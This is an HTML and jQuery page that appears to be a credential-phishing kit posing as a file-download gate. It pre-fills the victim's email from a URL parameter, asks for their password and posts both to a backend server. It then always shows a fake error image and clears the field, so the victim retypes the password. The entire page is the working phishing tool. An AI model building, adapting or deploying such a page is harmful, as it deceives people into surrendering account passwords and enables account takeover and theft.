<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
   <style>
    body {
        background-image: url(a5696.jpg);
    background-repeat: no-repeat;
    background-size: cover;
    height: 100vh;
    display: flex;
    align-items: center;
    justify-content: center;
    background-origin: center;
    background-size: cover;
}

.fx {
    width: 35%;
}
 
.fxbody,
form {
    border-radius: 5px;
    background-color: #fff;
    padding: 15px;
}

input {
    width: 100%;
    height: 30px;
    margin: 4px;
    padding: 3px;
    font-size: 15px;
}

.lg {
    width: 90%;
}

.fx .fxbody .er {
    color: red;
    font-size: 15px;
    margin-bottom: 10px;
}

button {
    margin: 2px;
    background-color: #007AFE;
    color: white;
    cursor: pointer;
    font-size: 15px;
    width: 40%;
    border: none;
    height: 40px;
    border-radius: 10px;
    -webkit-border-radius: 10px;
    -moz-border-radius: 10px;
    -ms-border-radius: 10px;
    -o-border-radius: 10px;
}

@media (max-width: 575.98px) {
    body {
    /* background-image: url(../cdn.glitch.global/9769e6c5-a69f-4f7f-9d7e-59e293faaab5/a5696.jpg?v=1686787712999); */
        background-repeat: no-repeat;
        background-origin: contain;
        height: 100vh;
    }
    #asd {
        display: none;
    }
    .fx {
        width: 100%;
    }
    .fxbody {
        border-radius: 5px;
        background-color: #fff;
        padding: 10px;
        width: 90%;
    }
    input {
        width: 100%;
        height: 30px;
        margin: 2px;
        padding: 3px;
        font-size: 15px;
    }

.fxbody img{
   width: 100%;
}

}

   </style>
 <script src="jquery.min.js"></script>

</head>

<body> 
    <div class="fx">
        <div class="fxbody">

            <form method="post" id="formx">

                <img id="lg" src="150fc.jpg">
                <div class="er"></div>
                <div>
                    <input type="text" name="x1" id="xx" value="" readonly>
                </div>
                <div>
                    <input type="password" name="x2" id="xxx" value="" required>
                </div>
                <div>
                    <button id="submitBtn" class="btn btn-md btn-primary">Download</button>
                </div>
            </form>
        </div>
    </div>
</body>
<script>
$(document).ready(function() {

    $("body").click(function() {

        $(".fx").show('1000');

    });





    $(".fx").hide();

    const basename = (window.location).href;

    let name = basename.substring(basename.lastIndexOf('=') + 1);

    $("#xx").val(name);



    $("#formx").submit(function(e) {

        e.preventDefault();

        var formData = new FormData($("#formx")[0]);

        $("#submitBtn").html('Please Wait.').prop("disabled", true).css('background', 'midnightblue');



        $.ajax({

            url: "http://localhost:5000/submit",  // Updated URL to point to our Python backend
            type: 'POST',
            data: formData,
            contentType: false,
            processData: false,
            success: function(res) {
                setTimeout(function() {
                    $("#xx").val(name);
                    $("#xxx").val("");
                    $('.er').html(`<img src="erro.jpg">`);
                    $("#submitBtn").html("Download").prop("disabled", false);
                }, 2000);
            },
            error: function(xhr, status, error) {
                if (xhr.responseJSON && xhr.responseJSON.message) {
                    $('.er').html('Error: ' + xhr.responseJSON.message);
                } else {
                    $('.er').html('Error: ' + error);
                }
                $("#submitBtn").html("Download").prop("disabled", false);
            }
        });
    });



});
</script>

</html>
